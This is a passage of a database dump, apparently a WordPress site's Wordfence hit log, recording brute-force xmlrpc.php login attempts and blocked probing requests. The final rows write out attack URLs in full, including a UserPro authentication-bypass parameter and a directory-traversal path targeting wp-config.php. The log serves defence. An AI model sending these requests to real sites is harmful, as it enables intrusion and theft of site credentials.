(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6144,0.000000,1629417313.897012,'\0\0\0\0\0\0\0\0\0\0��go(',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6145,0.000000,1629417751.347262,'\0\0\0\0\0\0\0\0\0\0����\\\\',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6146,0.000000,1629418024.084239,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6147,0.000000,1629418712.078317,'\0\0\0\0\0\0\0\0\0\0��Q�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6148,0.000000,1629419417.055205,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6149,0.000000,1629419707.586091,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6150,0.000000,1629420131.159004,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6151,0.000000,1629420858.722018,'\0\0\0\0\0\0\0\0\0\0���[J�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6152,0.000000,1629421578.428580,'\0\0\0\0\0\0\0\0\0\0��@�2�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6153,0.000000,1629422353.243691,'\0\0\0\0\0\0\0\0\0\0��12�k',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6154,0.000000,1629422668.709477,'\0\0\0\0\0\0\0\0\0\0��#��	',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6155,0.000000,1629423068.189060,'\0\0\0\0\0\0\0\0\0\0���@sZ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6156,0.000000,1629423850.256878,'\0\0\0\0\0\0\0\0\0\0��C�.',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6157,0.000000,1629424586.746142,'\0\0\0\0\0\0\0\0\0\0���@w�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6158,0.000000,1629425173.012708,'\0\0\0\0\0\0\0\0\0\0��e \Z�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6159,0.000000,1629425389.739070,'\0\0\0\0\0\0\0\0\0\0���[K	',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6160,0.000000,1629426176.050102,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6161,0.000000,1629426946.953594,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6162,0.000000,1629427355.159966,'\0\0\0\0\0\0\0\0\0\0��`wh',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6163,0.000000,1629427724.895634,'\0\0\0\0\0\0\0\0\0\0��DB�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6164,0.000000,1629428533.674414,'\0\0\0\0\0\0\0\0\0\0��4�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6165,0.000000,1629429331.178449,'\0\0\0\0\0\0\0\0\0\0���q��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6166,0.000000,1629429341.045372,'\0\0\0\0\0\0\0\0\0\0���0B�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6167,0.000000,1629430107.950703,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6168,0.000000,1629430922.800494,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6169,0.000000,1629431669.958394,'\0\0\0\0\0\0\0\0\0\0����9d',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6170,0.000000,1629431704.725775,'\0\0\0\0\0\0\0\0\0\0����i�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6171,0.000000,1629432542.448203,'\0\0\0\0\0\0\0\0\0\0��Q�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6172,0.000000,1629433394.436938,'\0\0\0\0\0\0\0\0\0\0���oC�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6173,0.000000,1629434012.456221,'\0\0\0\0\0\0\0\0\0\0���Z�C',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6174,0.000000,1629434190.574105,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6175,0.000000,1629435036.973461,'\0\0\0\0\0\0\0\0\0\0�����8',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6176,0.000000,1629435689.955122,'\0\0\0\0\0\0\0\0\0\0��3��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6177,0.000000,1629436156.638048,'\0\0\0\0\0\0\0\0\0\0���[i�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6178,0.000000,1629436283.186514,'\0\0\0\0\0\0\0\0\0\0�����g',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6179,0.000000,1629436545.183849,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6180,0.000000,1629436950.684245,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6181,0.000000,1629437315.180216,'\0\0\0\0\0\0\0\0\0\0���[i�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6182,0.000000,1629437711.386910,'\0\0\0\0\0\0\0\0\0\0����`�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6183,0.000000,1629438092.467527,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6184,0.000000,1629438442.158048,'\0\0\0\0\0\0\0\0\0\0��ϔK',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6185,0.000000,1629438513.461550,'\0\0\0\0\0\0\0\0\0\0��3[9�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6186,0.000000,1629438845.179570,'\0\0\0\0\0\0\0\0\0\0��h+�5',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6187,0.000000,1629439198.246581,'\0\0\0\0\0\0\0\0\0\0��e%�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6188,0.000000,1629439605.838887,'\0\0\0\0\0\0\0\0\0\0���zR',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6189,0.000000,1629439972.571509,'\0\0\0\0\0\0\0\0\0\0��P��\Z',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6190,0.000000,1629440348.909627,'\0\0\0\0\0\0\0\0\0\0��#�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6191,0.000000,1629440723.615529,'\0\0\0\0\0\0\0\0\0\0��@om�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6192,0.000000,1629440972.247394,'\0\0\0\0\0\0\0\0\0\0��3Q�$',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6193,0.000000,1629441110.069509,'\0\0\0\0\0\0\0\0\0\0��ՈLB',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6194,0.000000,1629441476.840081,'\0\0\0\0\0\0\0\0\0\0��]r��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6195,0.000000,1629442630.869060,'\0\0\0\0\0\0\0\0\0\0���2�1',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6196,0.000000,1629443364.553897,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6197,0.000000,1629443447.299885,'\0\0\0\0\0\0\0\0\0\0��\"E�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6198,0.000000,1629443751.351893,'\0\0\0\0\0\0\0\0\0\0��Bs�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6199,0.000000,1629444118.059811,'\0\0\0\0\0\0\0\0\0\0��Kw�\r',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6200,0.000000,1629444506.349943,'\0\0\0\0\0\0\0\0\0\0���l��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6201,0.000000,1629444871.035081,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6202,0.000000,1629445237.135941,'\0\0\0\0\0\0\0\0\0\0��[��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6203,0.000000,1629445598.611178,'\0\0\0\0\0\0\0\0\0\0����r�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6204,0.000000,1629445886.400541,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6205,0.000000,1629446390.197280,'\0\0\0\0\0\0\0\0\0\0���b�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6206,0.000000,1629446755.675561,'\0\0\0\0\0\0\0\0\0\0���#\r�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6207,0.000000,1629447155.226549,'\0\0\0\0\0\0\0\0\0\0��o�F',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6208,0.000000,1629447563.241182,'\0\0\0\0\0\0\0\0\0\0��ٓ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6209,0.000000,1629447991.727159,'\0\0\0\0\0\0\0\0\0\0���1K',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6210,0.000000,1629448377.899701,'\0\0\0\0\0\0\0\0\0\0��\"��G',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6211,0.000000,1629448818.070364,'\0\0\0\0\0\0\0\0\0\0��g*:f',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6212,0.000000,1629449225.577314,'\0\0\0\0\0\0\0\0\0\0��3�T�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6213,0.000000,1629449645.665469,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6214,0.000000,1629450064.627639,'\0\0\0\0\0\0\0\0\0\0���5T�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6215,0.000000,1629450486.709921,'\0\0\0\0\0\0\0\0\0\0���[J�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6216,0.000000,1629450904.460780,'\0\0\0\0\0\0\0\0\0\0���q\0�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6217,0.000000,1629451352.721797,'\0\0\0\0\0\0\0\0\0\0���	F�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6218,0.000000,1629451782.136002,'\0\0\0\0\0\0\0\0\0\0��g�.�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6219,0.000000,1629452217.078139,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6220,0.000000,1629452663.613176,'\0\0\0\0\0\0\0\0\0\0���q\0�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6221,0.000000,1629453108.502955,'\0\0\0\0\0\0\0\0\0\0��)�@K',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6222,0.000000,1629453551.029634,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6223,0.000000,1629454006.051767,'\0\0\0\0\0\0\0\0\0\0��g|_Y',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6224,0.000000,1629454462.767055,'\0\0\0\0\0\0\0\0\0\0��/r�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6225,0.000000,1629454925.516847,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6226,0.000000,1629455425.090780,'\0\0\0\0\0\0\0\0\0\0����d5',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6227,0.000000,1629455852.366901,'\0\0\0\0\0\0\0\0\0\0��-wS�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6228,1629455864.858945,1629455864.595200,'\0\0\0\0\0\0\0\0\0\0����G�',0,403,0,0,0,'https://www.equalitywalk.org.uk//wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','WAF-RULE-328','{\"learningMode\":0,\"failedRules\":\"328\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2VxdWFsaXR5d2Fsay5vcmcudWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"category\":\"bypass\",\"ssl\":1}'),(6229,1629455876.412229,1629455876.131700,'\0\0\0\0\0\0\0\0\0\0����G�',0,403,0,0,0,'https://www.equalitywalk.org.uk//wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Modern WPBakery Page Builder Addons <= 3.0.1 Unprotected AJAX Actions','{\"learningMode\":0,\"failedRules\":\"362\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2VxdWFsaXR5d2Fsay5vcmcudWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"category\":\"bypass\",\"ssl\":1}'),(6230,0.000000,1629456318.233226,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6231,0.000000,1629456803.502353,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6232,1629456873.174847,1629456872.844300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(6233,1629457010.146447,1629457009.013400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.equalitywalk.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(6234,1629457109.214054,1629457108.910800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - 